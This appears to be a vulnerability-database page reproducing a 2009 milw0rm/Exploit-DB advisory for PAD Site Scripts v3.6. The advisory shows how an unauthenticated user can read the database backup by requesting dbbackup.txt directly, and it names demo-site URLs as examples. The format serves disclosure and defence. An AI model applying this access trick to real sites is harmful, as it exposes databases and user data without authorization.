header-logo
Suggest Exploit
vendor:
PAD Site Scripts
by:
TiGeR-Dz
7,5
CVSS
HIGH
Bypass DB Backup
287
CWE
Product Name: PAD Site Scripts
Affected Version From: v3.6
Affected Version To: v3.6
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

PAD Site Scripts v3.6 Bypass DB Backup Vulnerability

This vulnerability allows an attacker to bypass the authentication requirement of the dbbackup.php page and read the backup without downloading it. The attacker can access the backup by going to the dbbackup.txt page.

Mitigation:

Ensure that authentication is required for all pages that contain sensitive information.
Source

Exploit-DB raw data:

---------------------------------------------------------------
---------------------------------------------------------------
PAD Site Scripts v3.6 Bypass DB Backup Vulnerability
---------------------------------------------------------------
Founder : TiGeR-Dz
Home:http://www.pad-site-scripts.com
Script:PAD Site Scripts v3.6
Download:http://www.pad-site-scripts.com/demo.php
Thank you my best Friends The g0bL!N and Hisok4
---------------------------------------------------------------
Exploit
-------
www.site.com/[path]/dbbackup.php
Note: We can not download Backup Because This site is required name admin and password for download Backup
and We will read Backup Without Download
Go to www.site.com/dbbackup.txt

And booooooooooom The backup is reading :)
----------------------------------------------------------------
Dem0
----
http://demo.pad-site-scripts.com/sysop/dbbackup.php
Go to
http://demo.pad-site-scripts.com/dbbackup.txt

And booooooooooom The backup is reading :)
--------------------------------------
Greeting To ALL My Friends (Dz)
----------------------------------------------------------------

# milw0rm.com [2009-06-01]